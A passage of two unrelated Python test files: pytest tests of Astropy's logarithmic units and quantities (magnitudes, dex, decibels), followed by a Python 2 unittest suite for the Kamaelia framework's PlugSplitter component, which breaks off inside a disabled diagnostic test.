"""Check various LogUnit subclasses are equivalent and convertible
to each other if they correspond to equivalent physical units."""
values = np.linspace(0., 10., 6)
flu = flu_unit(physical_unit)
tlu = tlu_unit(physical_unit)
assert flu.is_equivalent(tlu)
assert_allclose(flu.to(tlu), flu.function_unit.to(tlu.function_unit))
assert_allclose(flu.to(tlu, values),
values * flu.function_unit.to(tlu.function_unit))
tlu2 = tlu_unit(u.Unit(100.*physical_unit))
assert flu.is_equivalent(tlu2)
# Check that we round-trip.
assert_allclose(flu.to(tlu2, tlu2.to(flu, values)), values, atol=1.e-15)
tlu3 = tlu_unit(physical_unit.to_system(u.si)[0])
assert flu.is_equivalent(tlu3)
assert_allclose(flu.to(tlu3, tlu3.to(flu, values)), values, atol=1.e-15)
tlu4 = tlu_unit(u.g)
assert not flu.is_equivalent(tlu4)
with pytest.raises(u.UnitsError):
flu.to(tlu4, values)
def test_unit_decomposition(self):
lu = u.mag(u.Jy)
assert lu.decompose() == u.mag(u.Jy.decompose())
assert lu.decompose().physical_unit.bases == [u.kg, u.s]
assert lu.si == u.mag(u.Jy.si)
assert lu.si.physical_unit.bases == [u.kg, u.s]
assert lu.cgs == u.mag(u.Jy.cgs)
assert lu.cgs.physical_unit.bases == [u.g, u.s]
def test_unit_multiple_possible_equivalencies(self):
lu = u.mag(u.Jy)
assert lu.is_equivalent(pu_sample)
def test_magnitude_conversion_fails_message(self):
"""Check that "dimensionless" magnitude units include a message in their
exception text suggesting a possible cause of the problem.
"""
with pytest.raises(u.UnitConversionError) as excinfo:
(10*u.ABmag - 2*u.ABmag).to(u.nJy)
assert "Did you perhaps subtract magnitudes so the unit got lost?" in str(excinfo.value)
class TestLogUnitArithmetic:
def test_multiplication_division(self):
"""Check that multiplication/division with other units is only
possible when the physical unit is dimensionless, and that this
turns the unit into a normal one."""
lu1 = u.mag(u.Jy)
with pytest.raises(u.UnitsError):
lu1 * u.m
with pytest.raises(u.UnitsError):
u.m * lu1
with pytest.raises(u.UnitsError):
lu1 / lu1
for unit in (u.dimensionless_unscaled, u.m, u.mag, u.dex):
with pytest.raises(u.UnitsError):
lu1 / unit
lu2 = u.mag(u.dimensionless_unscaled)
with pytest.raises(u.UnitsError):
lu2 * lu1
with pytest.raises(u.UnitsError):
lu2 / lu1
# But dimensionless_unscaled can be cancelled.
assert lu2 / lu2 == u.dimensionless_unscaled
# With dimensionless, normal units are OK, but we return a plain unit.
tf = lu2 * u.m
tr = u.m * lu2
for t in (tf, tr):
assert not isinstance(t, type(lu2))
assert t == lu2.function_unit * u.m
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(lu2.physical_unit)
# Now we essentially have a LogUnit with a prefactor of 100,
# so should be equivalent again.
t = tf / u.cm
with u.set_enabled_equivalencies(u.logarithmic()):
assert t.is_equivalent(lu2.function_unit)
assert_allclose(t.to(u.dimensionless_unscaled, np.arange(3.)/100.),
lu2.to(lu2.physical_unit, np.arange(3.)))
# If we effectively remove lu1, a normal unit should be returned.
t2 = tf / lu2
assert not isinstance(t2, type(lu2))
assert t2 == u.m
t3 = tf / lu2.function_unit
assert not isinstance(t3, type(lu2))
assert t3 == u.m
# For completeness, also ensure non-sensical operations fail
with pytest.raises(TypeError):
lu1 * object()
with pytest.raises(TypeError):
slice(None) * lu1
with pytest.raises(TypeError):
lu1 / []
with pytest.raises(TypeError):
1 / lu1
@pytest.mark.parametrize('power', (2, 0.5, 1, 0))
def test_raise_to_power(self, power):
"""Check that raising LogUnits to some power is only possible when the
physical unit is dimensionless, and that conversion is turned off when
the resulting logarithmic unit (such as mag**2) is incompatible."""
lu1 = u.mag(u.Jy)
if power == 0:
assert lu1 ** power == u.dimensionless_unscaled
elif power == 1:
assert lu1 ** power == lu1
else:
with pytest.raises(u.UnitsError):
lu1 ** power
# With dimensionless, though, it works, but returns a normal unit.
lu2 = u.mag(u.dimensionless_unscaled)
t = lu2**power
if power == 0:
assert t == u.dimensionless_unscaled
elif power == 1:
assert t == lu2
else:
assert not isinstance(t, type(lu2))
assert t == lu2.function_unit**power
# also check we roundtrip
t2 = t**(1./power)
assert t2 == lu2.function_unit
with u.set_enabled_equivalencies(u.logarithmic()):
assert_allclose(t2.to(u.dimensionless_unscaled, np.arange(3.)),
lu2.to(lu2.physical_unit, np.arange(3.)))
@pytest.mark.parametrize('other', pu_sample)
def test_addition_subtraction_to_normal_units_fails(self, other):
lu1 = u.mag(u.Jy)
with pytest.raises(u.UnitsError):
lu1 + other
with pytest.raises(u.UnitsError):
lu1 - other
with pytest.raises(u.UnitsError):
other - lu1
def test_addition_subtraction_to_non_units_fails(self):
lu1 = u.mag(u.Jy)
with pytest.raises(TypeError):
lu1 + 1.
with pytest.raises(TypeError):
lu1 - [1., 2., 3.]
@pytest.mark.parametrize(
'other', (u.mag, u.mag(), u.mag(u.Jy), u.mag(u.m),
u.Unit(2*u.mag), u.MagUnit('', 2.*u.mag)))
def test_addition_subtraction(self, other):
"""Check physical units are changed appropriately"""
lu1 = u.mag(u.Jy)
other_pu = getattr(other, 'physical_unit', u.dimensionless_unscaled)
lu_sf = lu1 + other
assert lu_sf.is_equivalent(lu1.physical_unit * other_pu)
lu_sr = other + lu1
assert lu_sr.is_equivalent(lu1.physical_unit * other_pu)
lu_df = lu1 - other
assert lu_df.is_equivalent(lu1.physical_unit / other_pu)
lu_dr = other - lu1
assert lu_dr.is_equivalent(other_pu / lu1.physical_unit)
def test_complicated_addition_subtraction(self):
"""for fun, a more complicated example of addition and subtraction"""
dm0 = u.Unit('DM', 1./(4.*np.pi*(10.*u.pc)**2))
lu_dm = u.mag(dm0)
lu_absST = u.STmag - lu_dm
assert lu_absST.is_equivalent(u.erg/u.s/u.AA)
def test_neg_pos(self):
lu1 = u.mag(u.Jy)
neg_lu = -lu1
assert neg_lu != lu1
assert neg_lu.physical_unit == u.Jy**-1
assert -neg_lu == lu1
pos_lu = +lu1
assert pos_lu is not lu1
assert pos_lu == lu1
def test_pickle():
lu1 = u.dex(u.cm/u.s**2)
s = pickle.dumps(lu1)
lu2 = pickle.loads(s)
assert lu1 == lu2
def test_hashable():
lu1 = u.dB(u.mW)
lu2 = u.dB(u.m)
lu3 = u.dB(u.mW)
assert hash(lu1) != hash(lu2)
assert hash(lu1) == hash(lu3)
luset = {lu1, lu2, lu3}
assert len(luset) == 2
class TestLogQuantityCreation:
@pytest.mark.parametrize('lq, lu', zip(lq_subclasses + [u.LogQuantity],
lu_subclasses + [u.LogUnit]))
def test_logarithmic_quantities(self, lq, lu):
"""Check logarithmic quantities are all set up correctly"""
assert lq._unit_class == lu
assert type(lu()._quantity_class(1.)) is lq
@pytest.mark.parametrize('lq_cls, physical_unit',
itertools.product(lq_subclasses, pu_sample))
def test_subclass_creation(self, lq_cls, physical_unit):
"""Create LogQuantity subclass objects for some physical units,
and basic check on transformations"""
value = np.arange(1., 10.)
log_q = lq_cls(value * physical_unit)
assert log_q.unit.physical_unit == physical_unit
assert log_q.unit.function_unit == log_q.unit._default_function_unit
assert_allclose(log_q.physical.value, value)
with pytest.raises(ValueError):
lq_cls(value, physical_unit)
@pytest.mark.parametrize(
'unit', (u.mag, u.mag(), u.mag(u.Jy), u.mag(u.m),
u.Unit(2*u.mag), u.MagUnit('', 2.*u.mag),
u.MagUnit(u.Jy, -1*u.mag), u.MagUnit(u.m, -2.*u.mag)))
def test_different_units(self, unit):
q = u.Magnitude(1.23, unit)
assert q.unit.function_unit == getattr(unit, 'function_unit', unit)
assert q.unit.physical_unit is getattr(unit, 'physical_unit',
u.dimensionless_unscaled)
@pytest.mark.parametrize('value, unit', (
(1.*u.mag(u.Jy), None),
(1.*u.dex(u.Jy), None),
(1.*u.mag(u.W/u.m**2/u.Hz), u.mag(u.Jy)),
(1.*u.dex(u.W/u.m**2/u.Hz), u.mag(u.Jy))))
def test_function_values(self, value, unit):
lq = u.Magnitude(value, unit)
assert lq == value
assert lq.unit.function_unit == u.mag
assert lq.unit.physical_unit == getattr(unit, 'physical_unit',
value.unit.physical_unit)
@pytest.mark.parametrize(
'unit', (u.mag(), u.mag(u.Jy), u.mag(u.m), u.MagUnit('', 2.*u.mag),
u.MagUnit(u.Jy, -1*u.mag), u.MagUnit(u.m, -2.*u.mag)))
def test_indirect_creation(self, unit):
q1 = 2.5 * unit
assert isinstance(q1, u.Magnitude)
assert q1.value == 2.5
assert q1.unit == unit
pv = 100. * unit.physical_unit
q2 = unit * pv
assert q2.unit == unit
assert q2.unit.physical_unit == pv.unit
assert q2.to_value(unit.physical_unit) == 100.
assert (q2._function_view / u.mag).to_value(1) == -5.
q3 = unit / 0.4
assert q3 == q1
def test_from_view(self):
# Cannot view a physical quantity as a function quantity, since the
# values would change.
q = [100., 1000.] * u.cm/u.s**2
with pytest.raises(TypeError):
q.view(u.Dex)
# But fine if we have the right magnitude.
q = [2., 3.] * u.dex
lq = q.view(u.Dex)
assert isinstance(lq, u.Dex)
assert lq.unit.physical_unit == u.dimensionless_unscaled
assert np.all(q == lq)
def test_using_quantity_class(self):
"""Check that we can use Quantity if we have subok=True"""
# following issue #5851
lu = u.dex(u.AA)
with pytest.raises(u.UnitTypeError):
u.Quantity(1., lu)
q = u.Quantity(1., lu, subok=True)
assert type(q) is lu._quantity_class
def test_conversion_to_and_from_physical_quantities():
"""Ensures we can convert from regular quantities."""
mst = [10., 12., 14.] * u.STmag
flux_lambda = mst.physical
mst_roundtrip = flux_lambda.to(u.STmag)
# check we return a logquantity; see #5178.
assert isinstance(mst_roundtrip, u.Magnitude)
assert mst_roundtrip.unit == mst.unit
assert_allclose(mst_roundtrip.value, mst.value)
wave = [4956.8, 4959.55, 4962.3] * u.AA
flux_nu = mst.to(u.Jy, equivalencies=u.spectral_density(wave))
mst_roundtrip2 = flux_nu.to(u.STmag, u.spectral_density(wave))
assert isinstance(mst_roundtrip2, u.Magnitude)
assert mst_roundtrip2.unit == mst.unit
assert_allclose(mst_roundtrip2.value, mst.value)
def test_quantity_decomposition():
lq = 10.*u.mag(u.Jy)
assert lq.decompose() == lq
assert lq.decompose().unit.physical_unit.bases == [u.kg, u.s]
assert lq.si == lq
assert lq.si.unit.physical_unit.bases == [u.kg, u.s]
assert lq.cgs == lq
assert lq.cgs.unit.physical_unit.bases == [u.g, u.s]
class TestLogQuantityViews:
def setup(self):
self.lq = u.Magnitude(np.arange(1., 10.) * u.Jy)
self.lq2 = u.Magnitude(np.arange(1., 5.))
def test_value_view(self):
lq_value = self.lq.value
assert type(lq_value) is np.ndarray
lq_value[2] = -1.
assert np.all(self.lq.value == lq_value)
def test_function_view(self):
lq_fv = self.lq._function_view
assert type(lq_fv) is u.Quantity
assert lq_fv.unit is self.lq.unit.function_unit
lq_fv[3] = -2. * lq_fv.unit
assert np.all(self.lq.value == lq_fv.value)
def test_quantity_view(self):
# Cannot view as Quantity, since the unit cannot be represented.
with pytest.raises(TypeError):
self.lq.view(u.Quantity)
# But a dimensionless one is fine.
q2 = self.lq2.view(u.Quantity)
assert q2.unit is u.mag
assert np.all(q2.value == self.lq2.value)
lq3 = q2.view(u.Magnitude)
assert type(lq3.unit) is u.MagUnit
assert lq3.unit.physical_unit == u.dimensionless_unscaled
assert np.all(lq3 == self.lq2)
class TestLogQuantitySlicing:
def test_item_get_and_set(self):
lq1 = u.Magnitude(np.arange(1., 11.)*u.Jy)
assert lq1[9] == u.Magnitude(10.*u.Jy)
lq1[2] = 100.*u.Jy
assert lq1[2] == u.Magnitude(100.*u.Jy)
with pytest.raises(u.UnitsError):
lq1[2] = 100.*u.m
with pytest.raises(u.UnitsError):
lq1[2] = 100.*u.mag
with pytest.raises(u.UnitsError):
lq1[2] = u.Magnitude(100.*u.m)
assert lq1[2] == u.Magnitude(100.*u.Jy)
def test_slice_get_and_set(self):
lq1 = u.Magnitude(np.arange(1., 10.)*u.Jy)
lq1[2:4] = 100.*u.Jy
assert np.all(lq1[2:4] == u.Magnitude(100.*u.Jy))
with pytest.raises(u.UnitsError):
lq1[2:4] = 100.*u.m
with pytest.raises(u.UnitsError):
lq1[2:4] = 100.*u.mag
with pytest.raises(u.UnitsError):
lq1[2:4] = u.Magnitude(100.*u.m)
assert np.all(lq1[2] == u.Magnitude(100.*u.Jy))
class TestLogQuantityArithmetic:
def test_multiplication_division(self):
"""Check that multiplication/division with other quantities is only
possible when the physical unit is dimensionless, and that this turns
the result into a normal quantity."""
lq = u.Magnitude(np.arange(1., 11.)*u.Jy)
with pytest.raises(u.UnitsError):
lq * (1.*u.m)
with pytest.raises(u.UnitsError):
(1.*u.m) * lq
with pytest.raises(u.UnitsError):
lq / lq
for unit in (u.m, u.mag, u.dex):
with pytest.raises(u.UnitsError):
lq / unit
lq2 = u.Magnitude(np.arange(1, 11.))
with pytest.raises(u.UnitsError):
lq2 * lq
with pytest.raises(u.UnitsError):
lq2 / lq
with pytest.raises(u.UnitsError):
lq / lq2
# but dimensionless_unscaled can be cancelled
r = lq2 / u.Magnitude(2.)
assert r.unit == u.dimensionless_unscaled
assert np.all(r.value == lq2.value/2.)
# with dimensionless, normal units OK, but return normal quantities
tf = lq2 * u.m
tr = u.m * lq2
for t in (tf, tr):
assert not isinstance(t, type(lq2))
assert t.unit == lq2.unit.function_unit * u.m
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(lq2.unit.physical_unit)
t = tf / (50.*u.cm)
# now we essentially have the same quantity but with a prefactor of 2
assert t.unit.is_equivalent(lq2.unit.function_unit)
assert_allclose(t.to(lq2.unit.function_unit), lq2._function_view*2)
@pytest.mark.parametrize('power', (2, 0.5, 1, 0))
def test_raise_to_power(self, power):
"""Check that raising LogQuantities to some power is only possible when
the physical unit is dimensionless, and that conversion is turned off
when the resulting logarithmic unit (say, mag**2) is incompatible."""
lq = u.Magnitude(np.arange(1., 4.)*u.Jy)
if power == 0:
assert np.all(lq ** power == 1.)
elif power == 1:
assert np.all(lq ** power == lq)
else:
with pytest.raises(u.UnitsError):
lq ** power
# with dimensionless, it works, but falls back to normal quantity
# (except for power=1)
lq2 = u.Magnitude(np.arange(10.))
t = lq2**power
if power == 0:
assert t.unit is u.dimensionless_unscaled
assert np.all(t.value == 1.)
elif power == 1:
assert np.all(t == lq2)
else:
assert not isinstance(t, type(lq2))
assert t.unit == lq2.unit.function_unit ** power
with u.set_enabled_equivalencies(u.logarithmic()):
with pytest.raises(u.UnitsError):
t.to(u.dimensionless_unscaled)
def test_error_on_lq_as_power(self):
lq = u.Magnitude(np.arange(1., 4.)*u.Jy)
with pytest.raises(TypeError):
lq ** lq
@pytest.mark.parametrize('other', pu_sample)
def test_addition_subtraction_to_normal_units_fails(self, other):
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
q = 1.23 * other
with pytest.raises(u.UnitsError):
lq + q
with pytest.raises(u.UnitsError):
lq - q
with pytest.raises(u.UnitsError):
q - lq
@pytest.mark.parametrize(
'other', (1.23 * u.mag, 2.34 * u.mag(),
u.Magnitude(3.45 * u.Jy), u.Magnitude(4.56 * u.m),
5.67 * u.Unit(2*u.mag), u.Magnitude(6.78, 2.*u.mag)))
def test_addition_subtraction(self, other):
"""Check that addition/subtraction with quantities with magnitude or
MagUnit units works, and that it changes the physical units
appropriately."""
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
other_physical = other.to(getattr(other.unit, 'physical_unit',
u.dimensionless_unscaled),
equivalencies=u.logarithmic())
lq_sf = lq + other
assert_allclose(lq_sf.physical, lq.physical * other_physical)
lq_sr = other + lq
assert_allclose(lq_sr.physical, lq.physical * other_physical)
lq_df = lq - other
assert_allclose(lq_df.physical, lq.physical / other_physical)
lq_dr = other - lq
assert_allclose(lq_dr.physical, other_physical / lq.physical)
@pytest.mark.parametrize('other', pu_sample)
def test_inplace_addition_subtraction_unit_checks(self, other):
lu1 = u.mag(u.Jy)
lq1 = u.Magnitude(np.arange(1., 10.), lu1)
with pytest.raises(u.UnitsError):
lq1 += other
assert np.all(lq1.value == np.arange(1., 10.))
assert lq1.unit == lu1
with pytest.raises(u.UnitsError):
lq1 -= other
assert np.all(lq1.value == np.arange(1., 10.))
assert lq1.unit == lu1
@pytest.mark.parametrize(
'other', (1.23 * u.mag, 2.34 * u.mag(),
u.Magnitude(3.45 * u.Jy), u.Magnitude(4.56 * u.m),
5.67 * u.Unit(2*u.mag), u.Magnitude(6.78, 2.*u.mag)))
def test_inplace_addition_subtraction(self, other):
"""Check that inplace addition/subtraction with quantities with
magnitude or MagUnit units works, and that it changes the physical
units appropriately."""
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
other_physical = other.to(getattr(other.unit, 'physical_unit',
u.dimensionless_unscaled),
equivalencies=u.logarithmic())
lq_sf = lq.copy()
lq_sf += other
assert_allclose(lq_sf.physical, lq.physical * other_physical)
lq_df = lq.copy()
lq_df -= other
assert_allclose(lq_df.physical, lq.physical / other_physical)
def test_complicated_addition_subtraction(self):
"""For fun, a more complicated example of addition and subtraction."""
dm0 = u.Unit('DM', 1./(4.*np.pi*(10.*u.pc)**2))
DMmag = u.mag(dm0)
m_st = 10. * u.STmag
dm = 5. * DMmag
M_st = m_st - dm
assert M_st.unit.is_equivalent(u.erg/u.s/u.AA)
assert np.abs(M_st.physical /
(m_st.physical*4.*np.pi*(100.*u.pc)**2) - 1.) < 1.e-15
class TestLogQuantityComparisons:
def test_comparison_to_non_quantities_fails(self):
lq = u.Magnitude(np.arange(1., 10.)*u.Jy)
with pytest.raises(TypeError):
lq > 'a'
assert not (lq == 'a')
assert lq != 'a'
def test_comparison(self):
lq1 = u.Magnitude(np.arange(1., 4.)*u.Jy)
lq2 = u.Magnitude(2.*u.Jy)
assert np.all((lq1 > lq2) == np.array([True, False, False]))
assert np.all((lq1 == lq2) == np.array([False, True, False]))
lq3 = u.Dex(2.*u.Jy)
assert np.all((lq1 > lq3) == np.array([True, False, False]))
assert np.all((lq1 == lq3) == np.array([False, True, False]))
lq4 = u.Magnitude(2.*u.m)
assert not (lq1 == lq4)
assert lq1 != lq4
with pytest.raises(u.UnitsError):
lq1 < lq4
q5 = 1.5 * u.Jy
assert np.all((lq1 > q5) == np.array([True, False, False]))
assert np.all((q5 < lq1) == np.array([True, False, False]))
with pytest.raises(u.UnitsError):
lq1 >= 2.*u.m
with pytest.raises(u.UnitsError):
lq1 <= lq1.value * u.mag
# For physically dimensionless, we can compare with the function unit.
lq6 = u.Magnitude(np.arange(1., 4.))
fv6 = lq6.value * u.mag
assert np.all(lq6 == fv6)
# but not some arbitrary unit, of course.
with pytest.raises(u.UnitsError):
lq6 < 2.*u.m
class TestLogQuantityMethods:
def setup(self):
self.mJy = np.arange(1., 5.).reshape(2, 2) * u.mag(u.Jy)
self.m1 = np.arange(1., 5.5, 0.5).reshape(3, 3) * u.mag()
self.mags = (self.mJy, self.m1)
@pytest.mark.parametrize('method', ('mean', 'min', 'max', 'round', 'trace',
'std', 'var', 'ptp', 'diff', 'ediff1d'))
def test_always_ok(self, method):
for mag in self.mags:
res = getattr(mag, method)()
assert np.all(res.value ==
getattr(mag._function_view, method)().value)
if method in ('std', 'ptp', 'diff', 'ediff1d'):
assert res.unit == u.mag()
elif method == 'var':
assert res.unit == u.mag**2
else:
assert res.unit == mag.unit
def test_clip(self):
for mag in self.mags:
assert np.all(mag.clip(2. * mag.unit, 4. * mag.unit).value ==
mag.value.clip(2., 4.))
@pytest.mark.parametrize('method', ('sum', 'cumsum', 'nansum'))
def test_only_ok_if_dimensionless(self, method):
res = getattr(self.m1, method)()
assert np.all(res.value ==
getattr(self.m1._function_view, method)().value)
assert res.unit == self.m1.unit
with pytest.raises(TypeError):
getattr(self.mJy, method)()
def test_dot(self):
assert np.all(self.m1.dot(self.m1).value ==
self.m1.value.dot(self.m1.value))
@pytest.mark.parametrize('method', ('prod', 'cumprod'))
def test_never_ok(self, method):
with pytest.raises(TypeError):
getattr(self.mJy, method)()
with pytest.raises(TypeError):
getattr(self.m1, method)()
|
|
#!/usr/bin/env python2.3
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
import unittest
from Kamaelia.Util.Splitter import PlugSplitter as Splitter
from Kamaelia.Util.Splitter import addsink, removesink
from Kamaelia.Util.Splitter import Plug
from Axon.Ipc import producerFinished, shutdownMicroprocess
import Axon.Scheduler
from Axon.Scheduler import scheduler
from Axon.Linkage import linkage
from Axon.Component import component
from Axon.Axon import AxonObject
import Axon
import gc
#from test_Component import Component_Test
class DummyComponent(Axon.Component.component):
"""Simple component that terminates on receiving suitable messages,
but also logs all incoming messages"""
def __init__(self):
super(DummyComponent, self).__init__()
self.inboxlog = []
self.controllog = []
def main(self):
done=False
while not done:
yield 1
if self.dataReady("inbox"):
self.inboxlog.append(self.recv("inbox"))
if self.dataReady("control"):
msg = self.recv("control")
self.controllog.append(msg)
if isinstance(msg, producerFinished) or isinstance(msg, shutdownMicroprocess):
done=True
class TestComponent(component):
Inboxes = ["inbox","control","test"]
class DummyPostman:
def registerlinkage(self,linkage):
self.linkage=linkage
def runrepeat(gen, count = 100):
"""This just runs the specified generator the specified number of times. This
is used to try to make sure expected behaviour has sufficient timeslots to
succeed without taking too long."""
for i in xrange(count):
gen.next()
class Timeout(Exception):
def __init__(self, t=-1):
self.t = t
class Splitter_Test(unittest.TestCase):
def setUp(self):
self.src = component()
self.dst = component()
self.dst2 = TestComponent()
self.controller = component()
self.split = Splitter()
self.runner = self.split.main()
self.linkin = linkage(self.src,self.split)
self.linkcont = linkage(self.controller, self.split, sinkbox="configuration")
self.links = [self.linkin, self.linkcont]
# self.linkout1 = linkage(self.split,self.dst)
# self.linkout2 = linkage(self.split,self.dst2, sourcebox="out2")
#
# -- NEW STUFF ------
#
Axon.Scheduler.scheduler.run = Axon.Scheduler.scheduler()
self.execute = Axon.Scheduler.scheduler.run.main()
self.S = Splitter().activate()
self.D = component().activate()
self.D2 = TestComponent().activate()
self.W = component().activate()
self.W.link( (self.W, "outbox"), (self.S, "configuration") )
def waitEvent(self, cycles, conditionFunc, *args):
i = 0
while 1:
self.execute.next()
if conditionFunc(*args):
break
else:
i += 1
if i > cycles:
raise Timeout(i)
def runCycles(self, cycles=20):
for _ in xrange(cycles):
self.execute.next()
def deliverhelper(self):
# Next bit not really needed due to direct delivery was implemented since then...
pass
def test_isacomponent(self):
"__init__ - Splitter is a component."
self.failUnless(isinstance(self.split,component))
def test_simplepassthrough_defaultbox(self):
"""mainBody - This test sets up a sink and checks it receives sent messages using the default box."""
self.W.send(addsink(self.D), "outbox")
data = [ 1,2,3,4,5,6]
for i in data:
self.S._deliver(i, "inbox")
try:
self.waitEvent(10, self.D.dataReady, "inbox" )
except Timeout, e:
self.fail("Data hasn't arrived after "+str(e.t)+" cycles")
R = []
while 1:
try:
R.append(self.D.recv("inbox"))
except:
break
self.assert_( R == data )
def test_simplepassthrough(self):
"""mainBody - addsink -> configuration - An addsink object is sent to the
configuration box and it creates a new sink. A new outbox is created and
linked to the sink."""
self.W.send(addsink(self.D2, "test"))
data = [ 1,2,3,4,5,6]
for i in data:
self.S._deliver(i, "inbox")
try:
self.waitEvent(10, self.D2.dataReady, "test" )
except Timeout, e:
self.fail("Data hasn't arrived after "+str(e.t)+" cycles")
R = []
while 1:
try:
R.append(self.D2.recv("test"))
except:
break
self.assert_( R == data )
def test_addOutboxes(self):
"""mainBody - addsink->configurations - Adds a whole set of sinks and checks
they all receive expected messages."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.controller.send(addsink(c))
self.deliverhelper()
runrepeat(self.runner)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady())
self.failUnless(comp.recv() == i)
def test_addSinkInboxes_passthrough(self):
"""mainBody - addsink->configurations - Adds a whole set of sinks and checks
they all receive expected messages. Complicated by setting the sink to
passthrough and to be to an inbox."""
boxes = 10
boxlist = []
for x in xrange(boxes):
c=component()
boxlist.append(c)
self.links.append(linkage(source=c, sourcebox="outbox", sink=c, sinkbox="control"))
self.controller.send(addsink(c,"outbox",2))
self.deliverhelper()
runrepeat(self.runner)
for i in xrange(20):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.deliverhelper()
for comp in boxlist:
self.failUnless(comp.dataReady("control"))
self.failUnless(comp.recv("control") == i)
def test_removeOutboxes_default(self):
"""mainBody - addsink|removesink->configuration - Tests addition and removal
of sinks using the default box arguments. Adds a array of sinks, removes
the odd items and then checks that messages are delivered to the even
sinks and not the odd ones."""
boxes = 10
boxlist = {}
for x in xrange(boxes):
C = component().activate()
boxlist[x] = C
self.W.send(addsink(C), "outbox")
self.runCycles()
for x in xrange(1,boxes,2):
C = boxlist[x]
self.W.send(removesink(C), "outbox")
self.runCycles()
for i in xrange(20):
self.S._deliver(i, "inbox")
self.runCycles()
for j in xrange(0,boxes,2):
self.failUnless(boxlist[j].dataReady("inbox"))
self.failUnless(boxlist[j].recv("inbox") == i)
for j in xrange(1,boxes,2):
self.failIf(boxlist[j].dataReady("inbox"))
def test_removeOutboxes(self):
"""mainBody - addsink|removesink->configuration inbox - Tests addition and
removal of sinks. Adds a array of sinks, removes the odd items and then
checks that messages are delivered to the even sinks and not the odd ones."""
boxes = 10
boxlist = {}
for x in xrange(boxes):
C = TestComponent().activate()
boxlist[x] = C
self.W.send(addsink(C,"test"), "outbox")
self.runCycles()
for x in xrange(1,boxes,2):
C = boxlist[x]
self.W.send(removesink(C,"test"), "outbox")
self.runCycles()
for i in xrange(20):
self.S._deliver(i, "inbox")
self.runCycles()
for j in xrange(0,boxes,2):
self.failUnless(boxlist[j].dataReady("test"))
self.failUnless(boxlist[j].recv("test") == i)
for j in xrange(1,boxes,2):
self.failIf(boxlist[j].dataReady("test"))
def test_cleanup(self):
"""mainBody - addsink|removesink->configuration - Checks that there are no
object leakages by adding and then removing a sink and checking the
garbage collecter for its count of AxonObjects and lists."""
self.controller.send(addsink(self.dst))
before = 0
for x in gc.get_objects():
if isinstance(x, AxonObject) or isinstance(x,list):
before = before + 1
self.controller.send(addsink(self.dst))
self.controller.send(removesink(self.dst))
after = 0
for x in gc.get_objects():
if isinstance(x, AxonObject) or isinstance(x,list):
after = after + 1
self.failUnless(before == after)
def drd(self):
"Deliver Run Deliver"
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
def test_multipleboxessinglecomponent(self):
"""mainBody - addsink|removesink->configuration - Checks that multiple sink
inboxes on a single component can be added and removed independently."""
self.W.send(addsink(self.D2,"test"), "outbox")
self.runCycles()
self.S._deliver("ba", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == "ba")
self.W.send(addsink(self.D2), "outbox")
self.runCycles()
self.S._deliver("da", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failUnless(self.D2.dataReady("inbox")) #### FAILING : Should not(?)
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == "da")
self.failUnless(self.D2.recv("inbox") == "da") #### FAILING : Should not(?)
self.W.send(addsink(self.D2, "control"), "outbox")
self.runCycles()
self.S._deliver("bing", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failUnless(self.D2.dataReady("inbox")) #### FAILING : Should not(?)
self.failUnless(self.D2.dataReady("control")) #### FAILING : Should not(?)
self.failUnless(self.D2.recv("test") == "bing")
self.failUnless(self.D2.recv("inbox") == "bing") #### FAILING : Should not(?)
self.failUnless(self.D2.recv("control") == "bing") #### FAILING : Should not(?)
self.W.send(removesink(self.D2, "inbox"), "outbox")
self.runCycles()
self.S._deliver("a", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failUnless(self.D2.dataReady("control")) #### FAILING : Should not(?)
self.failUnless(self.D2.recv("test") == 'a')
self.failUnless(self.D2.recv("control") == 'a') #### FAILING : Should not(?)
self.W.send(removesink(self.D2, "control"), "outbox")
self.runCycles()
self.S._deliver("b", "inbox")
self.runCycles()
self.failUnless(self.D2.dataReady("test"))
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
self.failUnless(self.D2.recv("test") == 'b')
self.W.send(removesink(self.D2, "test"), "outbox")
self.runCycles()
self.S._deliver("c", "inbox")
self.runCycles()
self.failIf(self.D2.dataReady("test")) #### FAILING : Should not
self.failIf(self.D2.dataReady("inbox"))
self.failIf(self.D2.dataReady("control"))
#-----------------
def __test_createsink_defaultbox(self): # SMELL - internal diagnostic
"""createsink - Checks that a new sink is created and linked on calling creatsink with default box argument"""
self.split.createsink(self.dst)
for i in xrange(0,10):
self.src.send(i)
self.deliverhelper()
runrepeat(self.runner)
self.deliverhelper()
self.failUnless(self.dst.dataReady())
self.failUnless(self.dst.recv() == i)
def __test_simplepassthrough_createsink(self): # SMELL - internal diagnostic
"""createsink - Checks that a new sink is created and linked on calling creatsink with arguments"""
self.split.createsink(self.dst2,"test")
for i in xrange(0,10):
self.src.send(i)
